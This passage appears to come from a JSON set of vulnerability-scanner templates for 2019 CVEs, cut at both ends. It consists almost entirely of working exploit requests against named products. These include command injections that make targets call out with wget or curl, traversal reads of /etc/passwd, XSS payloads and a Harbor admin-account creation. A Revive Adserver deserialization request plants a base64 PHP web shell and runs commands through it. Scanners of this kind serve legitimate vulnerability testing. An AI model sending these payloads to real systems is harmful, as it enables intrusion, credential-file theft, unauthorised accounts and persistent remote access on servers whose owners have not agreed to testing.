{{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void 